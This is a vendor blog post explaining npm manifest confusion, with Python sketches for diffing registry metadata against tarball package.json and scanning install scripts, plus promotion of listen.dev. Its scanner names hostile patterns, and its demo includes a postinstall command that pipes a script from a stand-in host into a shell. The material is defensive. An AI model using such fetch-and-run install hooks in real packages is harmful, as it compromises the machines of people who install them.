Understanding and Preventing Manifest Confusion

Published by Garnet Research (@research)

A primer on manifest confusion in npm.

The npm ecosystem, built on the foundations of open collaboration and trust, has ironically become a hotbed for novel supply chain attacks in recent years. Bad actors have actively exploited the ecosystem’s design, as seen in the recent spam problem and, earlier, in dependency confusion attacks. This post discusses another vulnerability of a similar kind, termed Manifest Confusion.

What is Manifest Confusion?

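Recently disclosed in a blog post by Darcy Clarke, a former Engineering Manager at GitHub, Manifest Confusion refers to a discrepancy between the package metadata (manifest) that the npm registry serves and the package.json inside the package’s tarball. The discrepancy is possible because the registry accepts the manifest submitted at publish time without validating it against the contents of the tarball.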

This vulnerability allows malicious actors to craft packages with altered metadata, for example by hiding install scripts or dependencies from the registry’s view. This poses a significant risk to software supply chains and to applications that rely on the npm registry.

Manifest confusion provides an attacker with various methods to carry out supply chain attacks, including:

  1. Introduction of Install Scripts: Lifecycle scripts defined in package.json allow arbitrary code execution during installation. Install scripts are the leading method for malware delivery in the npm ecosystem (source), and they can be concealed from a package’s registry manifest while still being present in the tarball. This can lead to the compromise of critical infrastructure (such as developer machines and CI pipelines) and the introduction of malicious code into the application bundle.
  2. Stealthy Introduction of Dependencies: The flaw also enables an attacker to introduce hidden dependencies (or transitive dependencies) containing malicious code, which can serve as a launchpad for executing sophisticated multi-stage attacks.
  3. Evasion of Detection Mechanisms: Inconsistencies between metadata and tarball contents allow attackers to craft malicious packages that evade security and dependency auditing tools that rely on the upstream registry data as a source of truth.
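To make the first two risks concrete, here is a minimal Python sketch that takes two already-parsed manifests (the metadata the registry serves and the package.json found in the tarball) and reports install hooks that exist only in the tarball, plus dependency entries on which the two disagree. Because different clients and tools may read dependencies from either source, the dependency check reports mismatches in both directions. The function names and the package names in the demo are hypothetical; this is an illustration, not how any particular scanner works.

```python
# Sketch: report install hooks hidden from the registry manifest and
# dependencies on which the registry manifest and tarball package.json disagree.
# Both manifests are plain dicts parsed from JSON; names in the demo are hypothetical.

# Lifecycle hooks npm runs when a package is installed as a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Manifest sections from which npm can pull in further packages.
DEP_SECTIONS = ("dependencies", "optionalDependencies", "peerDependencies")


def hidden_install_scripts(registry: dict, tarball: dict) -> dict:
    """Install hooks in the tarball manifest that the registry omits or changes."""
    reg_scripts = registry.get("scripts", {})
    tar_scripts = tarball.get("scripts", {})
    return {
        hook: tar_scripts[hook]
        for hook in INSTALL_HOOKS
        if hook in tar_scripts and reg_scripts.get(hook) != tar_scripts[hook]
    }


def mismatched_dependencies(registry: dict, tarball: dict) -> dict:
    """Per section, map each differing dependency to (registry spec, tarball spec)."""
    mismatches = {}
    for section in DEP_SECTIONS:
        reg_deps = registry.get(section, {})
        tar_deps = tarball.get(section, {})
        diff = {
            name: (reg_deps.get(name), tar_deps.get(name))
            for name in sorted(set(reg_deps) | set(tar_deps))
            if reg_deps.get(name) != tar_deps.get(name)
        }
        if diff:
            mismatches[section] = diff
    return mismatches


if __name__ == "__main__":
    # What the registry advertises: no scripts, no dependencies.
    registry_manifest = {"name": "example-pkg", "version": "1.0.0"}
    # What actually ships in the tarball (hypothetical contents).
    tarball_manifest = {
        "name": "example-pkg",
        "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js"},
        "dependencies": {"some-helper": "^2.0.0"},
    }
    print(hidden_install_scripts(registry_manifest, tarball_manifest))
    # {'postinstall': 'node setup.js'}
    print(mismatched_dependencies(registry_manifest, tarball_manifest))
    # {'dependencies': {'some-helper': (None, '^2.0.0')}}
```

A tool that reads only the registry metadata would see a package with no scripts and no dependencies here, which is exactly the blind spot described in the third point.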

How to detect Manifest Confusion?

Detecting manifest confusion requires treating the actual package contents, rather than the registry metadata, as the source of truth. Here’s a step-by-step process to identify such anomalies:

  1. Download the package: Obtain the package tarball from the public registry.
  2. Check metadata: Retrieve the package’s metadata from the public registry, including name, version, dependencies, scripts, and other details.
  3. Compare with local package contents: Compare that metadata against the package.json and contents of the downloaded package, checking for any discrepancies that indicate tampering.
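The three steps above can be sketched with the Python standard library. This is a minimal illustration under a few assumptions: the package name is unscoped, the registry’s per-version endpoint (`https://registry.npmjs.org/<name>/<version>`) is used for metadata, and `FIELDS` is a hypothetical, non-exhaustive list of fields to cross-check. In code the metadata is fetched first, because it contains the tarball URL.

```python
# Sketch of the three detection steps for a single (unscoped) package version.
# Standard library only; FIELDS is an assumed, non-exhaustive list of fields.
import io
import json
import tarfile
import urllib.request

REGISTRY = "https://registry.npmjs.org"
FIELDS = ("name", "version", "dependencies", "optionalDependencies",
          "peerDependencies", "scripts", "bin")


def fetch(url: str) -> bytes:
    with urllib.request.urlopen(url) as resp:
        return resp.read()


def read_tarball_manifest(tarball: bytes) -> dict:
    """Parse the top-level package.json from a gzipped npm tarball."""
    with tarfile.open(fileobj=io.BytesIO(tarball), mode="r:gz") as tar:
        for member in tar.getmembers():
            # npm tarballs normally nest files under "package/", but the name of
            # the top-level directory is not guaranteed, so accept any single one.
            parts = member.name.removeprefix("./").split("/")
            if len(parts) == 2 and parts[1] == "package.json" and member.isfile():
                return json.load(tar.extractfile(member))
    raise ValueError("no top-level package.json found in tarball")


def diff_manifests(registry: dict, local: dict, fields=FIELDS) -> dict:
    """Map each field that differs to its (registry value, tarball value) pair."""
    return {
        field: (registry.get(field), local.get(field))
        for field in fields
        if registry.get(field) != local.get(field)
    }


def check_package(name: str, version: str) -> dict:
    # Step 2: metadata the registry serves for this exact version.
    registry_manifest = json.loads(fetch(f"{REGISTRY}/{name}/{version}"))
    # Step 1: download the tarball that the metadata points to.
    tarball = fetch(registry_manifest["dist"]["tarball"])
    # Step 3: compare against the package.json that actually ships.
    return diff_manifests(registry_manifest, read_tarball_manifest(tarball))
```

Calling `check_package("<name>", "<version>")` returns an empty dict when the checked fields agree. Some differences may be benign, such as normalization the npm CLI applies to fields like `bin` at publish time, so a non-empty result is best treated as a signal for review rather than proof of tampering.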

How listen.dev protects against Manifest Confusion

We’re building listen.dev to protect against the evolving nature of modern supply chain threats. Our team is pleased to announce that our system not only remained unaffected by the manifest confusion vulnerability but also provides comprehensive coverage to detect and block risks of this nature.

Powered by a multi-layered analysis approach, listen.dev offers unique detection capabilities against known and unknown threats that traditional dependency scanners or SCA tools might miss. To see this in action, let’s examine the PoC package published by Darcy and what listen.dev detects at each layer:

Get early access to listen.dev

The features shown below are in private preview. If you’re interested in early access, please reach out at [email protected].

Heuristic-based Metadata Analysis

listen.dev analyzes upstream package metadata and compares it against the actual contents of the tarball. This process identifies discrepancies such as those exploited in manifest confusion and flags them as potential risks.

[Figure: listen.dev metadata analysis]

Static Analysis of Package Code

listen.dev conducts static analysis of package source code using a set of heuristics for known supply chain risks, relying on the actual tarball contents as the source of truth. This approach flags install scripts and potentially malicious code, as shown below.

[Figure: listen.dev static analysis]
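listen.dev’s own rule set is not described here, so as a generic illustration only, the following Python sketch applies a few toy heuristics to the install-time scripts of a manifest read from the tarball (for example, the dict returned by parsing the tarball’s package.json). The pattern list and labels are hypothetical and would produce both false positives and misses in practice; real analyzers also inspect the JavaScript files those scripts invoke.

```python
# Toy heuristic scan of install-time scripts in a tarball's package.json.
# The patterns and labels below are hypothetical examples, not a real rule set.
import re

# Lifecycle hooks npm runs when a package is installed as a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

SUSPICIOUS_PATTERNS = {
    "pipes remote content to a shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    "evaluates inline code": re.compile(r"\bnode\s+(-e|--eval)\b"),
    "decodes a base64 payload": re.compile(r"base64\s+(-d|--decode)\b"),
    "references secrets in environment variables": re.compile(r"\$\{?[A-Z_]*(TOKEN|SECRET|KEY)"),
}


def scan_install_scripts(manifest: dict) -> list:
    """Return (hook, finding) pairs for each install-time script in the manifest."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if command is None:
            continue
        # Any install-time script is worth surfacing on its own.
        findings.append((hook, "install-time script present"))
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(command):
                findings.append((hook, label))
    return findings


if __name__ == "__main__":
    manifest = {"scripts": {"postinstall": "curl -s https://example.invalid/p.sh | sh"}}
    for hook, finding in scan_install_scripts(manifest):
        print(f"{hook}: {finding}")
```

Scanning the tarball’s manifest rather than the registry’s is the point of the design: a script hidden from the registry metadata is still visible here.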

Dynamic Behavioral Analysis

listen.dev goes beyond static analysis by pre-installing packages and observing their runtime behavior in a sandboxed environment. Powered by eBPF, this approach provides deep visibility into activities (such as the execution of install scripts) across the entire dependency tree, allowing proactive detection of suspicious behavior in packages even when those risks are unknown or not yet published in advisories.

[Figure: listen.dev dynamic analysis]

Below is an example of the full package page for the PoC package, showing a consolidated view of detected issues.

[Figure: Manifest Confusion Detection]

Impact on the ecosystem

The npm ecosystem and its associated tooling have traditionally relied on client-side validation, operating under the assumption that registry metadata and tarball contents are consistent. However, this trust-based approach leaves a loophole that can be exploited, underlining the need for cross-validation and for rethinking the ecosystem’s design and security.

Manifest confusion poses a significant threat to critical software infrastructure and the wider open-source community. Because it is a newly discovered attack vector, we recommend exercising extra caution by adopting proactive detection measures, leveraging state-of-the-art tooling, and raising awareness.

Stay tuned for our work in this area. If you’re interested in early access, we would love to hear from you!